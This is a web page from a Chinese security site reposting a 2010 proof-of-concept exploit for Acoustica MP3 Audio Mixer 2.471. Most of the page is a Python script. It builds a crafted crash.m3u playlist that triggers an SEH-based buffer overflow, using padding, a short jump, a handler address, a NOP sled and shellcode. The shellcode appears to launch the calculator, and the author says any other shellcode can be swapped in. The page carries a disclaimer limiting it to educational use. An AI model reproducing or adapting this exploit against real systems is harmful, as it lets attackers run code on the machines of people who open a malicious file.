首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
来源:shogilord@gmail.com 作者:Hollmann 发布时间:2010-09-10  

# Exploit Title: Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
# Date: September 8 2010
# Author: Carlos Hollmann
# Software Link: http://www.acoustica.com/downloading.asp?p=1
# Version: 2.471
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
# CVE :


#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __ 
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ / 
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/  

# COLOMBIA presents.............
#        PoC from  D3V!L FucK3r http://www.exploit-db.com/exploits/9213/
#
# Carlos Mario Penagos Hollmann A.K.A Elvenking  shogilord@gmail.com
# Extended M3U directives

#  Background from http://hanna.pyxidis.org/tech/m3u.html


 
# The software doesn't  handle correctly M3U's header and extra info when is being imported on a open sound group.
#  Trigger: launch app, open an existing sound group i.e(C:\Program Files\Acoustica MP3 Audio Mixer\example.sgp) then import the crash.m3u and....KaaaaBooom!!
#
#    
#     Greetings: My Family, Algeria-->sud0 Australia--> tecr0c,Peru-->fataku,Spain-->Alberto Hervalejo, OFFSEC TEAM and all my friends in Colombia
# !!! PAZ PARA MI PAIS PAZ PARA COLOMBIA !!! Freedom!!
 

 

# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# I do not want anyone to use this script
# for malicious and/or illegal purposes
# I cannot be held responsible for any illegal use.
 
# Note : you are not allowed to edit/modify this code.
# If you do, I will not be held responsible for any damages this may cause.

#!/usr/bin/python


magic  = "crash.m3u"


vuln  = "\x23\x0D\x0A\x23\x0D\x0A" # Extended M3U, no EXTM3U, no EXTINFO , can change OD for any  value \x1b,\x0a.........


junk   = "\x41" * 816
ds_eax   = "\x25\x25\x47\x7E" #First Call ds:[eax+8], Writeable memory address to put in EAX
morejunk  = "\x42" * 8308
nSEH   = "\xEB\x06\x90\x90" #short jmp 6 bytes
SEH   = "\x3F\x28\xD1\x72"#SEH Handler
nops   = "\x90" * 10 #landing padd
shellcode = "\x8b\xec\x55\x8b\xec\x68\x20\x20\x20\x2f\x68\x63\x61\x6c\x63\x8d\x45\xf8\x50\xb8\xc7\x93\xc2\x77\xff\xd0" # Thanks  sud0, any other shell works too  just remove "\x00\x0a"
payload = vuln+junk+ds_eax+morejunk+nSEH+SEH+nops+shellcode

file = open(magic , 'w')
file.write(payload)
file.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox XSLT Sort Remo
·Audiotran 1.4.2.4 SEH Overflow
·CS Cart 1.3.3 - Install.php XS
·Adobe CoolType SING Table "uni
·Process Hacker Dll Hijacking E
·Java RMIConnectionImpl Deseria
·Safari v5.0.1 DLL Hijacking (s
·FreeBSD 8.1/7.3 vm.pmap Kernel
·Beta Asp - Anket Database Disc
·Microsoft Office Visio DXF Fil
·BlogItDL Database Disclosure E
·Internet Explorer Dll Hijackin
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved